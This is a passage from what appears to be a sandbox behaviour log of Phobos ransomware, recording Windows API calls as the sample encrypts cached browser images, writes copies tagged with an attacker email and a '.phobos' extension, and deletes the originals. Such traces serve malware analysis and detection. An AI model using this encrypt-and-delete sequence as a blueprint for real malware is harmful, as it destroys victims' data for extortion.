lpNumberOfBytesWritten=0x2f4fc90*=0x160, lpOverlapped=0x0) returned 1 [0185.681] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0185.681] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.681] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.681] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.681] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.681] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.681] CloseHandle (hObject=0xb8) returned 1 [0185.681] CloseHandle (hObject=0x130) returned 1 [0185.682] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BB8AdqN[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bb8adqn[1].png")) returned 1 [0185.683] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.683] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2428) returned 1 [0185.683] CloseHandle (hObject=0x130) returned 1 [0185.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg")) returned 0x2020 [0185.684] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.684] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.684] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.685] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.685] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x97c, lpOverlapped=0x0) returned 1 [0185.702] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980, dwBufLen=0x980 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x980) returned 1 [0185.702] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x980, lpOverlapped=0x0) returned 1 [0185.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32aa8) returned 1 [0185.703] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.703] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.703] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0185.703] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.703] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.703] CloseHandle (hObject=0x130) returned 1 [0185.703] CloseHandle (hObject=0xb8) returned 1 [0185.703] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg")) returned 1 [0185.704] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.705] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10698) returned 1 [0185.705] CloseHandle (hObject=0xb8) returned 1 [0185.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg")) returned 0x2020 [0185.705] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.705] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.705] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.707] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.707] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.707] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29ca, lpOverlapped=0x0) returned 1 [0185.718] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29d0, dwBufLen=0x29d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29d0) returned 1 [0185.719] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x29d0, lpOverlapped=0x0) returned 1 [0185.719] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0185.719] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.719] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.719] CryptDestroyKey (hKey=0xa32c28) returned 1 [0185.719] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.720] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.720] CloseHandle (hObject=0xb8) returned 1 [0185.720] CloseHandle (hObject=0x130) returned 1 [0185.720] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg")) returned 1 [0185.721] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.721] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2146) returned 1 [0185.721] CloseHandle (hObject=0x130) returned 1 [0185.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg")) returned 0x2020 [0185.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.722] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.722] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.722] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.722] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.722] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x862, lpOverlapped=0x0) returned 1 [0185.824] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870, dwBufLen=0x870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x870) returned 1 [0185.824] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x870, lpOverlapped=0x0) returned 1 [0185.825] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0185.825] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.826] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.826] CryptDestroyKey (hKey=0xa32a68) returned 1 [0185.826] WriteFile (in: hFile=0xb8, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.826] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.826] CloseHandle (hObject=0x130) returned 1 [0185.826] CloseHandle (hObject=0xb8) returned 1 [0185.826] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg")) returned 1 [0185.828] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.829] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5417) returned 1 [0185.829] CloseHandle (hObject=0xb8) returned 1 [0185.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg")) returned 0x2020 [0185.831] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0185.831] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.831] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0185.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.832] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0185.832] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.832] ReadFile (in: hFile=0xb8, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1529, lpOverlapped=0x0) returned 1 [0185.852] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1530, dwBufLen=0x1530 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1530) returned 1 [0185.852] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1530, lpOverlapped=0x0) returned 1 [0185.853] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0185.853] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0185.853] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0185.853] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0185.853] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0185.853] CryptDestroyKey (hKey=0xa327e8) returned 1 [0185.853] CloseHandle (hObject=0xb8) returned 1 [0185.853] CloseHandle (hObject=0x130) returned 1 [0185.854] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg")) returned 1 [0185.854] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0185.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0185.855] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=7777) returned 1 [0185.855] CloseHandle (hObject=0x130) returned 1 [0185.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg")) returned 0x2020 [0185.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0185.855] CreateFileW 